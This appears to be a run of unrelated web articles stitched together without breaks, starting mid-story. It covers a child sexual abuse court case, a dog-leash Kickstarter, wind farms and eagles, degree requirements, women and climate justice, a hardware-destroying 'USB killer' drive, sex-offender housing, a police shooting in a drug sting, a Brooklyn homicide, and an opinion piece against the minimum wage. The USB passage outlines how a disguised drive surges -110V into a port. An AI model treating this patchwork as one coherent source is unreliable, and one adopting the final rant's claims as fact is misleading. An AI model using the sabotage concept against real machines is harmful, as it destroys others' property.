He then arranged to meet the victim a second time, after asking her to return headphones he had left at her house. They later met at a subway near to her home before going to a field where he raped and sexually assaulted the girl.
The second victim, then 14, was attacked in August 2011 after she had complained to McDermott on Facebook that she couldn't get anyone to buy cigarettes and alcohol for her from a local shop.
He immediately volunteered to help out and got her two bottles of vodka, and a pack of cigarettes. But he also said he expected sex in return.
The girl drank an entire bottle of vodka before going into Agecroft Park with him, where they had sex. McDermott was arrested by police in August last year after complaints against him had been made by one of the girls.
Then, while still on bail for offences against two of the three, he went on the following October to commit offences against his third victim, a 13-year-old girl he again met through Facebook, befriending her and arranging to meet her in a park in Irlams O'Height where he engaged in sexual activity with her.
The court heard McDermott, an only child, was ''less mature emotionally and socially than expected for his age.''
Lawyers said there was no evidence to suggest that he was deliberately trawling the internet seeking likely victims, and his actions were said to be ''opportunistic.''
But after the case Det Con Nicola Wood, of Greater Manchester Police Serious Sexual Offences Unit, said: "Without exaggeration, McDermott is every parent's worst nightmare.
"He trawled the internet and befriended young, vulnerable girls that he went on to rape or sexually assault.
"Some thought he cared about them but all were too young to consent to any sexual activity. A fact he knew full well but chose to ignore for his own sexual gratification.
"This has had a significant impact on all victims and their families and I hope they are reassured that he is now behind bars where he can no longer pose a threat.
"I would also urge parents to be mindful of who their loved ones are interacting with over the internet and to ensure their children are fully aware of the dangers and potential consequences of befriending strangers."
McDermott was also prohibited for an indefinite period from making any contact with the girls. His name will also be passed on to the Independent Safeguarding Authority which can impose restrictions on him.
You'll need an HTML5 capable browser to see this content. Play Replay with sound Play with
sound 00:00 00:00
CLIC leash with LEADER system
LANYARD and BUDDY leash
EASY TETHERING with CLIC* mechanism
Tethering has never been as easy as with CLIC. This elegant leash enables you to tether your pup even with only one hand available. (*patent pending)
Advantages of the CLIC mechanism:
Tether your dog in one simple gesture
Tether with one hand
Tether your dog without having to unleash your dog
Don't let your dog get away due to a bad knot
Adjust the length of your leash between two length settings with ease
Bring more dogs along by simply adding a 'BUDDY leash'
THE MORE THE MERRIER with BUDDY leash
Who says three is a crowd? If you have more than one dog, we have a 'BUDDY leash' that can attach to a 'CLIC leash' with a click!
YOU ARE THE BOSS with our special LEADER SYSTEM*
There are many different ways to lead a dog. How you lead yours ultimately depends on your dog and your personal preference. Because it is such a super personal decision, we recognize that it might be a different choice between different people in the household, or even under different circumstances. With CLIC's specially developed LEADER system*, High5dogs provides you with the first leash in the world that lets you lead your dog in 4 different ways at any given time. (*patent pending)
Whilst creating CLIC I envisioned what the easiest and most elegant gesture of tethering would be. The process led to a new interpretation of a traditional dog leash. Stylish, sleek and multi-functional. To compliment our custom designed hardware, we found a factory that is willing to help us tailor make beautiful braided rope to create the perfect urban lifestyle leash.
You'll need an HTML5 capable browser to see this content. Play Replay with sound Play with
sound 00:00 00:00
Whether your dog is the size of a Jack Russel or a Golder Retriever, the CLIC leash will fit your dog as it is designed to be used on almost all dogs over 10 lbs (5kg) with or without a collar or harness.
Pabu the Beagle
Saul the Bulldog mix
Gizmo the Tibetan spaniel
Datum the Boxer
Daichi the Akita
Bruno the Doberman Pincher
If your dog is a strong puller that weighs over 60 LBS / 30kg, we do not recommend using CLIC.
We gave a leading dog trainer, Mark Peters, a few leashes to try and after a week or two he came back with the following comment: "The CLIC leash is a winning combination of style and function. For trips into town with our four dogs they are ideal. I really appreciate being able to tie up the dogs using the one-hand click action, and to have the option of various collars and leash lengths. All this makes the CLIC leash a perfect multi-purpose tool for a multi-dog family. I doubt you'll find a more stylish leash out there on the market."
(Award winning dog trainer Mark Peters is from the United Kingdom and has lived and worked in Hong Kong for over 18 years).
We are super excited to introduce the CLIC leash to you here on Kickstarter. All the product development has been done over the last year and we have even produced an initial test batch (which we gave to some dog shelters). But we do need your support in order to reach the demands of the minimum order quantities to start our first commercial production orders. Please back us so we can help facilitate the bond between you and your dog and to make life a bit more happy and convenient.
A PERSONAL NOTE FROM DANNY
"This project started because our happy dog Gizmo wants to come with us no matter what we are up to. Me, I often find that it is just too inconvenient to bring Gizmo with me, and my wife Kelly finds all the functional leashes not representative for many different reasons. So we were in need for something that is both good looking and practical because we do love to bring Gizmo with us whenever we can. He was even at our wedding! That was a year ago, and was the starting point for CLIC. Now after many sampling rounds and improvements, we are ready to share CLIC with fellow dog lovers around the world and hope that you too can enjoy the convenience and joy of bringing your dog with you everywhere you go".
Stray Friends Foundation
On her days off, Kelly can often be found at our local dog shelter - SAI KUNG STRAY FRIENDS FOUNDATION which houses over 90 dogs from all over Hong Kong.
SKSF are now facing financial hardship. Their existing lease expires soon and they will be forced to vacate the premises. They are now in the process of raising funds in order to secure a new location to shelter the dogs. That is why we really want to help them. High5dogs will donate 10% of all funds raised on this campaign to SKSF for this purpose. Please help us help our Stray Friends.
You'll need an HTML5 capable browser to see this content. Play Replay with sound Play with
sound 00:00 00:00 Off
English
CLIC with leader system, black melange rope with gold color hardware
CLIC with leader system, black melange rope with silver color hardware
Buddy leashes, black melange rope with gold or silver color hardware
Lanyard, black melange rope with gold or silver color hardware
DIY patterns of our 'DOGGY ELF' costumes
Specs of the CLIC leash
CLIC mechanism for easy tethering
Leash your dog in 4 different ways with the Leader system
Special braided rope
Genuine leather trimmings
Imperial sizes: rope thickness: 7/16", length 60", tethered length 48".
Metric sizes: rope thickness 11 mm, length 155 cm, tethered length 125 cm.
Specs of the buddy leash
Exclusive High5dogs hardware
Leash your dog in 4 different ways with the Leader system
Special braided rope
Genuine leather trimmings
Imperial sizes: rope thickness: 7/16", length 37".
Metric sizes: rope thickness 11 mm, length 95 cm.
Once me meet our goal, we can start making the CLIC- and BUDDY leashes in 2 color combinations:
1. Braided melange rope in BLACK with SILVER colored hardware and black leather trimmings; and
2. Braided melange rope in BLACK with GOLD colored hardware and black leather trimmings.
Step by step we aim to 'unleash' three more colors as our stretch goals!
CLIC mechanism
LEADER system
Genuine leather and special braided rope
The full retail price of the CLIC leash with LEADER system will be $69. Because you are supporting us on Kickstarter, not only you are getting a great deal but you will be the first one to own one of our beautiful products. We will not be selling any High5dogs products in retail until all Kickstarter rewards have been shipped.
HOW DO THE REWARD LEVELS AND ADD-ONS WORK?
1. Choose a reward level.
Everybody can choose 1 reward level to back this project (you cannot choose more than 1 reward level). You will get all rewards in that reward level once the campaign is funded and the goods are produced (this will take a little time as this is a crowdfunding project and not an e-commerce business). You cannot swap rewards that you don't want for other rewards that you do want. You can tell us your preferred colors of the rewards after the campaign.
2. Add additional items to your reward with our add-ons.
Choose from the add-on items. Add the value of what you would like to add-on and add that to your pledged reward level amount. For example: If you pledge for 'Reward D' for $55 and you would like to add a buddy leash ($29) and two lanyards ($24 each), simply change your pledge amount from $55 to 55+29+24+24= $132.
Please note that you can not add any add-ons that are of greater value than your pledged reward.
3. Wait for the campaign to end.
All details like shipping information, color preference and add-on specifics, will be collected via a survey after this campaign closes in January 2016.
Leading up to this campaign we have done all the design, product development, tooling and even run some test orders to make sure everything is ready for the follow up when our campaign is successful.
Obviously we can not deliver our fantastic rewards to you before the holidays. However, if you would like to gift one of our rewards to your friends or loved ones for the holidays, please email us at holidaygift@high5dogs.com and let us know your pledge. We will email you a fun seasons greeting stating you have pledged for a gift that you can forward to the lucky recipient.
Happy Holidays!
Danny, Kelly & Gizmo
Being a start up we have to rely on friends with special powers to make magic happen. Please meet our dedicated team:
It's not easy to unite the right-wing Heartland Institute and bird-loving environmentalists.
But that's what some wind energy developers appear to be doing by proposing to the federal government that they be allowed to kill bald eagles and other protected species with their turbines.
Across the country, 14 wind projects have applied to the U.S. Fish and Wildlife Service for permits that would let them “take” — aka harm or kill — a certain number of eagles each year. That includes four wind farms in California, one in Minnesota, and one in Oklahoma.
The Oklahoma project could be the first in the nation to actually receive such a permit. The company behind it, Wind Capital Group, wants permission to kill up to three bald eagles every year for 40 years on its proposed 94-turbine wind farm. A Native American tribe in the area is protesting, as are some conservation groups. The Daily Ardmoreite reports:
Osage Nation Principal Chief John D. Red Eagle expressed his deep concern and opposition to killing eagles in Osage territory from a cultural standpoint. “The eagle is a sacred and symbolic figure to the Osage people, and the area targeted for this project contains a high bald eagle population,” Red Eagle said. “While the Osage Nation does not oppose wind energy or alternative energy, we do oppose the specific area for this project. It all comes down to siting projects in appropriate places, and this is not an appropriate place for a massive wind energy project.”
Reuters reports that the Obama administration has been working to loosen wildlife rules to facilitate wind development:
The fight in Oklahoma points to the deepening divide between some conservationists and the Obama administration over its push to clear the way for renewable energy development despite hazards to eagles and other protected species. … It is illegal to kill bald and golden eagles, either deliberately or inadvertently, under protections afforded them by two federal laws, the Migratory Bird Treaty Act and the Bald and Golden Eagle Protection Act. In the past, federal permits allowing a limited number of eagle deaths were restricted to narrow activities such as scientific research. But the Obama administration in 2009 broadened such permitting authority to include otherwise lawful activities like wind power developments. Now the U.S. Fish and Wildlife Service is seeking to lengthen the duration of those permits from five to 30 years to satisfy an emerging industry dependent on investors seeking stable returns.
As we've reported previously, the Obama administration has never prosecuted a wind farm for killing a protected bird, and it recently assured a California wind farm and a luxury real-estate development that they wouldn't be prosecuted for accidentally killing endangered California condors.
The prospect of eagle “take” permits has angered some folks on the left and on the right — and in between. This despite conditions that would be attached to such permits compelling wind companies to contribute to eagle conservation efforts.
Of course, conservationists and right wingers don't actually see eye to eye on this issue. The conservationists don't want bald eagles, golden eagles, or other protected birds to be killed in the name of energy. “If they kill two birds, I think it's a crime,” Steve Groth of the Minnesota-based Coalition for Sensible Siting told Minnesota Public Radio.
On the other hand, the Heartland Institute, whose funders include ExxonMobil, is opportunistically seizing an excuse to slam a fast-growing alternative to planet-baking fossil fuels.
The wind industry, for its part, says worries about eagle deaths are exaggerated. Again from Reuters:
Fewer than 2 percent of all human-caused deaths of golden eagles occur at modern wind farms and only a few bald eagle deaths have been documented in the history of the industry — far less mortality than is attributed to such causes as poisoning or vehicle collisions, said the American Wind Energy Association spokesman Peter Kelley.
The American Bird Conservancy thinks that birds and wind energy can exist in harmony — it's just going to take hard work, careful research, and federal regulations. From the nonprofit's website:
American Bird Conservancy supports wind power when it is bird-smart, and believes that birds and wind power can co-exist if the wind industry is held to mandatory standards that protect birds. Bird-smart wind power employs careful siting, operation and construction mitigation, bird monitoring, and compensation, to reduce and redress any unavoidable bird mortality and habitat loss. These are issues that the federal government should include in mandatory wind standards.
The bald eagle is a symbol of freedom and an iconic beneficiary of America's environmental movement, which saved it from extinction by banning DDT and passing laws to protect endangered species. No climate activists would want it to become the new face of opposition to the renewable energy revolution.
Imagine applying for a job that requires a college degree, even though the employee currently doing the same work doesn't have one.
But that's exactly the situation many job seekers find themselves in -- and companies may be shooting themselves in the foot in the process.
Employers are increasingly demanding that applicants have better qualifications than the person already doing the same job, according to a new study published Tuesday by Harvard Business School professor Joseph Fuller.
This trend means that otherwise qualified workers are missing out on good jobs. It also costs companies more in salaries and comes as America has 6.1 million job openings -- a number that's near a record high.
"By raising the bar academically, employers are often hurting their own economics and slamming the door on the opportunity to give a good-paying job to an increasing number of Americans," says Fuller.
Related: This is the biggest mystery in the U.S. economy
Businesses routinely say they are having trouble finding skilled or available workers, according to surveys conducted by the Federal Reserve. The manufacturing sector in particular has reported severe labor shortages.
But factory bosses have raised the bar for job applicants. For example, 67% of the job postings in 2015 for supervisors of production workers required a college degree. But only 16% of the existing supervisors actually had a college education.
Fuller argues that this trend is a key undercurrent in the broader debate about wage inequality. Workers without college degrees increasingly have fewer job options even though they may have the skills for a better-paying gig.
Related: Job training saved her life
In total, the bar has been raised on 6.2 million jobs that didn't previously require a college degree, according to the study, which was done in partnership with consulting giant Accenture, Grads of Life -- a nonprofit that connects employers to Opportunity Youth -- and Burning Glass Technologies, a Boston-based data firm.
Researchers focused on "middle skill" jobs -- those that require more than a high diploma but less than a 4-year college degree.
They found that employers increasingly demanded a college degree because the job skills for a particular position rapidly changed and companies preferred to not pay for job training.
But hiring college grads for jobs that non-college grads can do carries a litany of hidden costs, according to the study.
For one, the majority of employers paid as much as 30% more to hire an applicant with a college education instead of an applicant without a 4-year degree. Companies also suffered from high turnover rates and long periods of time with unfilled jobs.
Related: Holiday hiring is getting more difficult for retailers
And people searching for work -- particularly supervisors, clerks, inspectors and secretaries -- have suffered too. The majority of the 600 businesses surveyed admitted that demanding a 4-year degree excludes some applicants.
Some firms create online job application sites that automatically weed out applications without a college degree.
"Even workers who have relevant experience are excluded," said Fuller, who examined 26 million job postings, in the study.
Fuller recommends companies partner with local community colleges or job training centers to better prepare young workers or give middle-aged workers new, relevant skills.
He also suggested in the report that employers remove automatic filters in their online job applications and use a more customized vetting process that includes people who have not graduated from college.
The women of the Marshall Islands and the Pacific have been fighting colonialism and injustice for a long time. They bore the brunt of the long term effects of nuclear testing, and women leaders like Lijon Eknilang and Darlene Keju-Johnson brought these issues to the international stage.
Facebook Twitter Pinterest President Heine makes a speech at COP23 in Bonn. Photograph: Kieria Worth/ENB/IISD
For women, fighting for justice – including climate justice – can be downright dangerous. Last year was one of the deadliest for women fighting on the frontlines for human rights and environmental justice. Environmental defenders are being killed at the rate of almost four a week across the world, a staggering toll that disproportionately affects female activists and indigenous leaders. Among the most high-profile cases was Honduran indigenous Lenca leader Berta Cáceres, who was murdered in 2016. And for every woman like Cáceres who is killed, dozens of others are threatened with violence or destruction of their home or village or vital resources.
Yet despite this perilous landscape, where corporations and even the governments who are in their pocket threaten life itself, these women continue to stand up for freedom of expression and participation, for land rights and the rights of indigenous and rural communities. For sexual and reproductive health and rights, against harassment and gender-based discrimination. And for the right to preserve a safe, liveable environment for present and future generations.
At the UN climate talks in Bonn, the cause of these courageous women is being amplified by a host of organisations working on gender and climate justice issues through the Women and Gender Constituency. Together they are working to raise awareness of the work already done by women on the ground to combat climate change, and also, critically, how climate policies should address their specific needs and responsibilities and ensure the realisation of their rights.
The tragic reality of gender and climate is that women, especially women of colour, are disproportionately affected by the impacts of climate change, but are far less likely to be empowered to cope because they have fewer resources such as power and access to finance and technology. A multitude of structural barriers means they are far less likely to take up position of political power and decision-making.
Yet, when it comes to solutions — from large-scale mitigation efforts to focused, local resiliency responses — the gender perspective is often lacking, and the particular rights and needs of women are overlooked or downgraded in importance. Women aren't making enough of the decisions, and the decisions aren't yet doing enough for women.
Consider the issue of climate finance, where developed countries that have accumulated wealth through the combustion of fossil fuels have pledged aid to developing countries to be spent on climate solutions. In choosing actions to fund, financiers too often default to large, centralised projects, looking more at emissions data and financial rates of return than at social and human impacts. Making climate finance more gender-responsive would help address the specific needs and responsibilities of women, and channel funding to smaller scale projects that benefit women.
Ultimately, putting more decision-making in the hands of local communities, including indigenous women is the clearest path to ensuring a just climate response. A more democratised energy system based on 100% renewables allows for the input from women and promotion of their rights more than a fossil fuel-based economy run by and for the benefit of unaccountable corporations. One such system could be constructed of energy cooperatives, which are community-based and democratically run, helping to ensure equal access to affordable and sustainable energy.
In August 2017, my government organised a major international conference in the Marshall Islands bringing together female leaders from the Pacific. Our experiences and conclusions concurred with the findings of many studies on women's role in promoting development. Women are key activists protecting vital common resources, and at the forefront of developing local climate solutions respecting and incorporating traditional knowledge. Women consistently show ingenuity, creativity, and drive. While women and girls still bear the heaviest burden of climate change's impacts — and while women continue to be threatened with harassment and violence, they continue to speak up to defend our waters, our trees, our soil, and our atmosphere. They have proven to be the most effective agents of change.
Facebook Twitter Pinterest Flooding in the Marshall Islands highlights the Pacific island nation's vulnerability to climate change. Photograph: Hilary Hosia/AFP/Getty Images
This week at COP23, all governments must reach an agreement that will ensure enough climate ambition to stay below a global warming of 1.5C. To make sure that all climate action will include gender equality, the governments will agree on a Gender Action Plan. In the next two years, the plan will aim to increase the number of female climate decision-makers, train male and female policymakers on bringing gender equality into climate funding programmes, and engage grassroots and indigenous women's organisations for local and global climate action.
If you're a mischief-maker of a certain age, you'll remember the idea of the floppy disk bomb, a specially engineered floppy disk that would supposedly melt inside an enemy's drive. This USB is that same basic concept but evolved. It's designed to electrocute your computer from the inside out.
An article about the bomb-drive—first posted on the Russian website Habrahabr by its designer, and then translated into English on Kukuruku Hub—describes its design and intended effect, fortunately without going into the details of how to make one. The idea, roughly, is to fill a standard-looking USB case with hardware that will pulse a high-voltage charge into a USB port and just fry everything nearby.
Advertisement
Per Kukuruku Hub:
When we connect it up to the USB port, an inverting DC/DC converter runs and charges capacitors to -110V. When the voltage is reached, the DC/DC is switched off. At the same time, the filed transistor opens. It is used to apply the -110V to signal lines of the USB interface. When the voltage on capacitors increases to -7V, the transistor closes and the DC/DC starts. The loop runs till everything possible is broken down.
Who knows how well this would actually work, and at best it seems that it might kill one USB drive. That is still a hell of a prank but not exactly the apocalypse. Either way, folks in the comments are clamoring to buy one on Kickstarter, and I'm suddenly a little more wary to just go around jamming strange thumb drives in my ports.
Advertisement
[Kukuruku Hub via Boing Boing]
The Republic | azcentral.com Tue Dec 4, 2012 1:53 PM
Arizona is not unique in its struggles to monitor and house sex offenders. No state does it well, experts say.
An eight-month review by The Arizona Republic found troubling gaps in Arizona's system of registering and monitoring sex offenders, with overlapping laws and restrictions contributing to homelessness among high-risk offenders.
In central Phoenix and Tucson, many homeless sex offenders who are required to provide an address to authorities register to street corners because they have nowhere else to go. That leaves many homeless offenders largely unmonitored despite authorities' efforts to track them.
States from California to Massachusetts see similar situations but are taking different approaches to try to solve the politically vexing policy problem. None has found a comprehensive solution.
“I can't really give you any places” that do a good job managing the problem, said Andrew Harris, associate professor of criminal justice and criminology at the University of Massachusetts-Lowell, whose research focuses on sex-offender housing restrictions. “What I can give you is the lessons we're learning.”
The issue first received national attention in 2008 amid reports of a large Florida sex-offender colony — more than 70 people, according to the American Civil Liberties Union — forming under a Miami causeway. It was one of the few locations in Miami-Dade County where registered sex offenders could legally reside after local jurisdictions enacted restrictions banning them from neighborhoods and the central city.
The ensuing debate focused attention on sex-offender housing restrictions, their sometimes unintended consequences and how society deals with the problem.
Since then, sex offenders in other states have been found registered to dumpsters and living in tents in the woods.
Given the increasingly dire housing situations some sex offenders face, it is just a matter of time until the nation sees a major legal challenge of housing restrictions, Harris said. “I think we'll see a case at the (U.S.) Supreme Court within the next five years,” he said.
No easy answers
Registering sex offenders upon their release from prison became the national strategy in the mid-1990s, when a federal law was passed after lobbying by a child victim's family. The intent was to track sexual offenders and, in theory, protect the public.
But years later, authorities in most states still stumble over inevitable complications from this approach: Who keeps track and how? Should all offenders be treated alike? How should authorities determine who is likely to commit sex offenses again? What policies are likely to prevent or encourage re-offending? What rights do offenders have after serving their sentences? How should states address offender homelessness without appearing to be soft on crime?
In many states, additional residency restrictions enacted at the local level add a layer of ordinances, which are difficult to sort out and place even more limits on where sex offenders can live.
Florida, for example, has more than 150 local statutes restricting housing options for sex offenders, according to that state's Department of Corrections. Those restrictions leave small pockets of acceptable living areas where sex offenders congregate in large numbers.
Other states have similar scenarios, among them California, Colorado, Indiana, Michigan, Ohio, Oklahoma, New York, North Carolina, Rhode Island and Washington.
The California Sex Offender Management Board four years ago recommended against blanket restrictions on sex-offender housing, finding that they increased the likelihood that offenders would become homeless and that the state would lose track of them. The recommendation was ignored. A state law still bars sex offenders from living within 2,000 feet of schools and parks, and local jurisdictions can piggyback their own restrictions.
The number of homeless sex offenders soared in California after statewide restrictions took effect in 2006. A year later, offenders registered as transient increased by 101 percent, according to a 2011 report by the Sex Offender Management Board. As of March 2011, nearly one-third of paroled California sex offenders were homeless, the report said.
There is no apparent political will in California to change the law, just as there is little stomach in states like Arizona to solve the problem, even though reducing homelessness could improve the effectiveness of state registration laws.
“It's an ongoing dilemma, and I think that legislators grapple with it. Researchers grapple with it. I'm not sure that there's a quick or easy answer,” said Jill Levenson, a leading researcher on the topic and associate professor at Lynn University in Boca Raton, Fla. “Nobody wants to be the public face of leniency for sex offenders.”
Video: Pat Powers is operations manager at Miracle Park. Twenty years ago, he was a racquetball coach who pleaded no contest to molesting 11 of his teen and pre-teen students
Alternatives not pursued
Examples of the system's failures keep stacking up.
Earlier this year, the Indianapolis Star found discrepancies in Indiana's sex-offender registry. Some offenders were registered to vacant lots or non-existent addresses. Others registered as living on the outside were actually in jail.
In Cleveland, more than half of sex offenders registered to a men's homeless shelter were not actually sleeping there or had never been there to begin with.
When the majority of Boston's highest-risk sex offenders were found to be registered to homeless shelters in 2009, a legislative fight erupted to ban them from shelters.
Levenson believes state laws are mostly well-intentioned responses to concerns about protecting children and communities. “Unfortunately, those are some of those unintentional consequences of these laws,” she said. “(Imposing housing restrictions) seems to make some intuitive, logical sense. ... There's sort of this false sense of security that occurs.” But, she added, “where do we think they're going to go?”
Levenson has found no evidence that restricting where sex offenders live or requiring them to notify the surrounding community about their presence leads to reduced rates of recidivism. Nor has she found evidence that it increases public safety, prevents sex abuse or protects children.
Many of the laws are based on the notion that all sex offenders have the same background, Levenson said, and they are stereotyped as being “all incurable, compulsive, repetitive pedophiles who are deviantly attracted to kids and will never stop.”
Instead, she said, “everybody is individual, and the one-size-fits-all policies may not be the most efficient route to go.”
Yet most states don't know what else to do because there are no best practices to emulate. Given the high stakes, few are willing to experiment with alternatives.
Communities of offenders
Florida offers a graphic example of what can happen when restrictions are draconian.
Authorities uprooted the colony under Miami's Julia Tuttle Causeway roughly two years after it came to light, placing its residents in temporary housing. But those offenders could not find permanent housing and have gone elsewhere, said Ron Book, chairman of the Miami-Dade County Homeless Trust.
Some ended up in what amount to penal colonies — communities of offenders that formed in remote or industrial pockets that have no housing restrictions.
In Miami-Dade, there still are few places where sex offenders can live. Rules limit where sex offenders can be at night. Large, round-the-clock buffer zones bar them from areas where children gather and effectively limit their living in residential areas.
Many now live in a run-down Miami trailer park in an industrial area near the airport. Families with children lived there for decades. Then, sex offenders evicted from beneath the causeway arrived in droves.
“I mean, they're everywhere,” said Sophia Ramez, who sometimes visits her mother there with three children in tow under 4 years old. “My kids, they're always close, because you never know. It could be five, 10 minutes, they're gone.”
Endless rows of trailer homes are packed close to one another, surrounded by hoards of antique decorations, old furniture and trash bags of belongings strewn outside. The humid air traps the odors of trash, musty water and cigarettes close to the ground.
“This is Third World,” said one sex offender, who asked to be identified by his initials, A.B. He moved there after living under the Miami causeway for two years.
“Protecting the children is paramount, and that does make sense,” he said between puffs on a cigarette. “If the true objective is protecting the children, education is key. ... The idea that you can't live in a place to the point of homelessness is just ridiculous.”
A.B.'s landlord also is a convicted sex offender. The landlord rents to about 15 sex offenders at the trailer park, charging them $250 to $400 a month. Because offenders have a difficult time finding and keeping jobs, it is not unusual for rent payments to back up for six months.
Band-Aid approach
Colonies of sex offenders have taken root in other Florida counties, as well. One of the few places not violating local residential restrictions in Palm Beach County is a church ministry of about 100 sex offenders living in a remote, marshy area of South Florida.
In Fort Myers in Lee County, sex offenders have found refuge with a sympathetic landlady willing to give them a second chance. She runs an apartment complex where they live. She rents to them, advocates for them, even cooks them a homemade meal every now and then.
Advocates for reforming Florida's sex-offender housing laws say the state has taken a Band-Aid approach to the problem, patching one problem after another by piling restrictions atop other restrictions. They point to studies showing harsh residency limits can create conditions that increase the likelihood sex offenders will re-offend or abscond without registering.
Advocates also argue that laws limiting where sex offenders live fail to take into account sexual offenses committed inside the home.
“Politicians really need to bite the bullet and recognize that ... public hysteria does not lead to good public policy,” said Jeanne Baker of the American Civil Liberties Union of Florida, who has fought to increase housing options for sex offenders.
Video: ACLU Miami lawyer Jeanne Baker details the problems homeless sex offenders face finding places to live.
But José “Pepe” Diaz, a Miami-Dade commissioner, supports strong residency restrictions, saying they protect the public by limiting offenders' contact with children.
“(An offender) has the right to breathe, to eat, to live — but they don't have the right to abuse children,” said Diaz, who has helped pass residency limits in Miami-Dade County. “Our job is to protect the public as a whole, not to protect individuals that are sick.”
Although no state has mastered the balance between public safety and offender reintegration, experts point to Colorado as a state trying to make it work.
Colorado officials examined residency restrictions for about eight years and found those policies did not reduce recidivism, said Chris Lobanov-Rostovsky, program manager at the Colorado Sex Offender Management Board.
Board officials have concluded that sex-offender homelessness and unemployment raise the risks of recidivism. They hope to educate communities that “if you give these offenders resources and opportunities to reintegrate, that raises the success rates,” Lobanov-Rostovsky said.
Colorado's Sex Offender Management Board works to identify short-term housing for offenders and encourages local jurisdictions not to enact residency restrictions. The board is urging government to collaborate with faith-based and non-profit groups to establish residential programs that help offenders reintegrate into the community.
“We're trying to give them a constructive method of trying to deal with it, versus wishing the offenders will just go away and go to other jurisdictions,” Lobanov-Rostovsky said.
Police conducting an undercover, street-level, reverse drug sting in Putnam County, Florida, shot and killed one of their targets Friday night as he attempted to drive away from the scene. Andrew Anthony Williams, a 48-year-old black man, becomes the 11th person to die in US domestic drug law enforcement operations so far this year.
According to local press accounts, all relying on law enforcement sources, deputies and detectives from the Putnam County Sheriff's Office were conducting a "reverse sting" where they posed as drug dealers, sold unwary customers small amounts of drugs, and then arrested them.
Deputies had successfully sold drugs to and arrested 10 people, but when they identified themselves and tried to arrest Williams, who was number 11, he declined. "[H]e drove away quickly and hit a tree," the St. Augustine Record reported. "The man next backed up toward the deputies, then put the vehicle into drive and turned toward some of them, the Sheriff's Office said. Four deputies fired at the oncoming vehicle almost simultaneously, the Sheriff's Office said."
News 4 Jax had it this way: "…when they tried to arrest Williams, he took off in a blue SUV and, swerving to avoid deputies, ran into a tree. Williams then backed up and tried to take off again toward deputies causing four of them to open fire on Williams SUV, hitting him an unknown number of times."
Williams was taken to a local hospital, where he was pronounced dead. One deputy was wounded in the gunfire, but that bullet came from another deputy's gun, according to the Sheriff's Office. (In the headline for its story about the incident, News 4 Jax neglected to mention that anyone had been killed, going with "Putnam County deputy hit by bullet fired at suspect.")
The Sheriff's Office did not identify the four deputies involved in the shooting, but was quick to make available Williams' criminal history, which including charges for drugs, fleeing, eluding, resisting arrest, and battery on a law enforcement officer.
The four deputies are on paid administrative leave.
This killing should raise a few questions, both about the nature of the operation itself and about what actually occurred.
Reverse drug stings are a controversial tactic, sometimes arguably justifiable at the higher echelons of the drug trade, where selling sizeable quantities of drugs to a player to see where they go help crack a drug ring, but that logic isn't at work here, where the only result is to round up some street drug buyers and drag them into the criminal justice system. Is having deputies pretend to be drug dealers to bust small-time users really the county's best use of its law enforcement resources?
And then there's the no-witness "he was going to run me over" defense used by the police to justify the killing. It happens not infrequently. Williams may have decided that getting busted on a minor dope charge was worth trying to murder a group of police officers with his vehicle. But could it have been that he was just trying to get away?
It'll be up to the Florida Department of Law Enforcement, which investigates officer-involved killings, to get to the bottom of it.
The police on Sunday were still trying to identify the body of a man found floating off the docks of a southeast Brooklyn neighborhood, an eerie reminder of an old-fashioned organized crime story.
A passer-by noticed the body wrapped in a blue tarp bobbing on the waves on Saturday morning near East 58th Street and Avenue U in the Mill Basin inlet, the police said. The tarp was wrapped with gray duct tape and the man's legs were tied with an orange electrical cord, which was fastened to a cinder block, the police said.
The man died of blunt force trauma to the head and his death was ruled a homicide on Sunday, said Julie Bolcer, a spokeswoman for the medical examiner's office.
It is not uncommon for the authorities to find bodies in New York City waterways, but they are usually found in the spring, when higher temperatures speed decomposition, producing gases that make a body buoyant enough to float to the surface.
According to the latest Consumer Price Index data from The Labor Department, it has never - ever - been more expensive to "dine out" relative to "eating at home."
In December last year, in another instance showcasing the real intellectual capacity of career and academic economists and those clueless enough to listen to them, we warned repeatedly that even the smallest of mandatory wage hikes would ripple through the economy and unleash extensive price increases across the board, not to mention countless job cuts as small and medium business, already struggling with keeping profits from plunging, had to find ways to eliminate overhead or raise prices.
As a result of this latest forced governmental intervention into the economy, everyone would be far worse off. But while we had seen isolated cases of mostly food sector companies push prices higher, so far there has not been a coordinated industry-wide effort that will see a sizable impact on food inflation. This will change for New Yorkers starting on January 1, when the cost of a night out in the Big Apple is about to get even pricier. As the Post reports, NYC diners can expect their restaurant and bar tabs to rise as much as 10 percent, plus tips, as restaurants seek to protect their profit margins from mandatory wage hikes; some eateries will eliminate tipping entirely - that primary source of incremental wages for thousands of food industry workers - and are hiking base prices by as much as 30%, with the money going toward higher payroll.
And so, here we are a few months later... and the cost of "eating out" is exploding relative to a home-cooked meal...
As Bloomberg adds,
The Labor Department's latest consumer-price data show the difference between the index of food costs away from home and the measure of inflation for home-cooked meals is the largest in records back to 1953. The widening began in earnest around the start of the third quarter of 2015 just as gasoline costs slid, indicating restaurants were confident higher menu prices would stick... presumably to cover higher payroll costs.
Finally, we leave it to SprottMoney.com's Nathan McDonald to explain how the minimum wage is a curse, not a blessing...
Central planners and politicians have no clue when it comes to creating wealth. They are incapable of creating growth and a productive economy, despite what they would have you believe. The government cares about one thing above all else: expanding itself and its power. One of the methods in which they have done this through history, up until the point in which it becomes so bloated it implodes on itself, is through the expansion of social welfare programs. In the West, a large portion of the population now finds itself stuck in this very cycle, the social welfare cycle, which is the doom of all established economies – the cycle of "why should I work if I can make more money sitting at home?" The logic is sound; you can't entirely blame those for thinking this way, as it is only human nature to take the easy way out, no matter the cost to our future or the wellbeing of generations down the road. The biggest challenge for government is how to expand this dependant class, while making it seem to the rest of us (who support the welfare class) that this is not their intention. One stealth method of achieving this end goal is through the nefarious "minimum wage." To the naked eye, minimum wage is a great thing. Yet to those of us who are awake and understand basic economics, we know that this has been one of the great blights in the West and has hollowed out our manufacturing base and shipped untold jobs overseas. Minimum wage forces companies, such as McDonald's, to come up with newer and newer solutions to replace humans in the work force, pricing people out, as politicians raise the bar ever higher, making it less and less feasible to hire people to do jobs. It becomes cheaper and cheaper to replace workers with machines. In some cases this has led to great innovations, yet in others it has been a great detriment to mankind, putting many out of the workforce and causing vast poverty in many sectors where there was once untold wealth. This "pricing out" of mankind is happening in many industries, with McDonald's, for example, making it very clear that they will be replacing much of their workforce with machinery as the minimum wage price goes up. This will add no increase in service to the customer, but will place much more stress on our already fragile system. I have seen this first-hand. In Canada there are numerous "self-checkout" McDonald's kiosks, where only one staff member can be seen on the front line, and the rest are represented by machines with which you fill out and pay for your own order, interacting with barely anyone during your experience there.
